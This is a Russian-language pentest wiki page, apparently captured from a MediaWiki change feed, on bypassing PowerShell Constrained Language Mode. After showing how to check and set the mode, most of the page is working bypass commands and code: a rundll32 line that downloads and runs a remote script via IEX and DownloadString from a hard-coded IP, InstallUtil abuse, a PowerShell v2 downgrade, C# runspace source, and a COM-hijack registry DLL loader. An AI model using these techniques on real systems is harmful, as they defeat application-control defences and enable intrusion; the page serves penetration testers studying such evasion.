http://itsecwiki.org/index.php?action=history&feed=atom&title=Clm 2026-05-18T19:43:42Z История изменений этой страницы в вики MediaWiki 1.27.7 http://itsecwiki.org/index.php?title=Clm&diff=1035&oldid=prev 2022-03-16T14:02:07Z

<p>Новая страница: «<a href="/index.php/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:Pentest" title="Категория:Pentest">Категория:Pentest</a> CLM(Constrained Language Mode) - мера защиты powershell от вызова критичных функций. = Обще…»</p> <p><b>Новая страница</b></p><div>[[Категория:Pentest]]<br /> <br /> CLM(Constrained Language Mode) - мера защиты powershell от вызова критичных функций.<br /> <br /> = Общее =<br /> <br /> == Определить включен ли CLM ==<br /> <br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> PS C:\&gt; $ExecutionContext.SessionState.LanguageMode<br /> FullLanguage<br /> PS C:\&gt; $ExecutionContext.SessionState.LanguageMode<br /> ConstrainedLanguage<br /> &lt;/syntaxhighlight&gt;<br /> <br /> == Поменять режим(права админа) ==<br /> <br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> PS C:\&gt; $ExecutionContext.SessionState.LanguageMode<br /> FullLanguage<br /> PS C:\&gt; $ExecutionContext.SessionState.LanguageMode = &quot;ConstrainedLanguage&quot;<br /> PS C:\&gt; $ExecutionContext.SessionState.LanguageMode<br /> ConstrainedLanguage<br /> &lt;/syntaxhighlight&gt;<br /> <br /> Или выставить/удалить системную переменную окружения &quot;__PSLockdownPolicy&quot; (значение &quot;4&quot; если включено).<br /> <br /> = Обход защиты =<br /> <br /> == rundll32.exe ==<br /> <br /> https://github.com/iomoath/PowerShx<br /> <br /> <br /> https://github.com/ropbear/CLMBypass<br /> <br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> rundll32.exe CLMBypass.dll,Run IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.72:8080/LAPSToolkit/LAPSToolkit.ps1');<br /> rundll32 PowerShx.dll,main -i<br /> PowerShx.exe -i<br /> &lt;/syntaxhighlight&gt;<br /> <br /> == InstallUtil.exe ==<br /> <br /> https://github.com/calebstewart/bypass-clm<br /> <br /> <br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> dir \Windows\Microsoft.NET\* /s/b | findstr InstallUtil.exe$<br /> <br /> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U &quot;C:\tmp\bypass-clm.exe&quot;<br /> &lt;/syntaxhighlight&gt;<br /> <br /> == powershell version 2 ==<br /> <br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> powershell -version 2<br /> &lt;/syntaxhighlight&gt;<br /> <br /> == Custom PowerShell Runspace ==<br /> <br /> &lt;syntaxhighlight lang=&quot;csharp&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> using System;<br /> using System.Management.Automation;<br /> using System.Management.Automation.Runspaces;<br /> <br /> namespace CLMBypass<br /> {<br /> class Program<br /> {<br /> static void Main(string[] args)<br /> {<br /> String cmd = args[0];<br /> Runspace rs = RunspaceFactory.CreateRunspace();<br /> rs.Open();<br /> PowerShell ps = PowerShell.Create();<br /> ps.Runspace = rs;<br /> ps.AddScript(cmd);<br /> ps.Invoke();<br /> rs.Close();<br /> }<br /> }<br /> }<br /> &lt;/syntaxhighlight&gt;<br /> <br /> Скомпилировать как<br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /r:&quot;System.Management.Automation.dll&quot; CLMBypass.cs<br /> &lt;/syntaxhighlight&gt;<br /> <br /> <br /> Использовать<br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> .\CLMBypss.exe &quot;COMMAND&quot;<br /> &lt;/syntaxhighlight&gt;<br /> <br /> == dll loader - создание своего object type ==<br /> <br /> Поместить DLL на сервер и запустить следующий код:<br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> $dllPath = &quot;C:\test.dll&quot;<br /> $uuid = &quot;{72C24DD5-D70A-438B-8A42-98424B88D3AD}&quot;<br /> <br /> New-PSDrive -PSProvider Registry -Name HKU -Root HKEY_USERS -erroraction 'silentlycontinue' | Out-Null<br /> <br /> $matches = whoami /user | select-string -Pattern &quot;(S-1-5-[-0-9]+)&quot; -all | select -ExpandProperty Matches<br /> $sid = $matches.value<br /> <br /> $key = 'HKU:\{0}_classes' -f $sid<br /> <br /> # Добавление InProcServer<br /> New-Item -Path $key -Name CLSID -erroraction 'silentlycontinue' | Out-Null<br /> $key = 'HKU:\{0}_classes\CLSID\{1}' -f $sid, $uuid<br /> New-Item -Path $key -Name 'InprocServer32' -erroraction 'silentlycontinue' | Out-Null<br /> $key = 'HKU:\{0}_classes\CLSID\{1}\InprocServer32' -f $sid, $uuid<br /> New-ItemProperty -Path $key -Name &quot;(Default)&quot; -Value $dllPath -PropertyType String -Force -erroraction 'silentlycontinue' | Out-Null<br /> <br /> # Добавляем коротное название<br /> $key = 'HKU:\{0}_classes' -f $sid<br /> New-Item -Path $key -Name xpn -erroraction 'silentlycontinue' | Out-Null<br /> $key = 'HKU:\{0}_classes\xpn' -f $sid<br /> New-Item -Path $key -Name CLSID -erroraction 'silentlycontinue' | Out-Null<br /> $key = 'HKU:\{0}_classes\xpn\CLSID' -f $sid<br /> New-ItemProperty -Path $key -Name &quot;(Default)&quot; -Value $uuid -PropertyType String -Force -erroraction 'silentlycontinue' | Out-Null<br /> <br /> # Запуск<br /> New-Object -ComObject xpn -ErrorAction 'SilentlyContinue' | Out-Null<br /> &lt;/syntaxhighlight&gt;<br /> <br /> Можно написать DLL, который будет отключать CLM. <br /> <br /> <br /> Подробнее: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/<br /> <br /> == MSF Meterpreter ==<br /> <br /> Meterpreter в метасплоите отключает защиту CLM.<br /> <br /> Для этого нужно создать соединение, перейти в него и ввести следующие команды:<br /> &lt;syntaxhighlight lang=&quot;powershell&quot; line=&quot;1&quot; enclose=&quot;div&quot; style=&quot;overflow-x:scroll&quot; &gt;<br /> load powershell<br /> powershell_shell<br /> &lt;/syntaxhighlight&gt;<br /> = Ссылки =</div>

Drakylar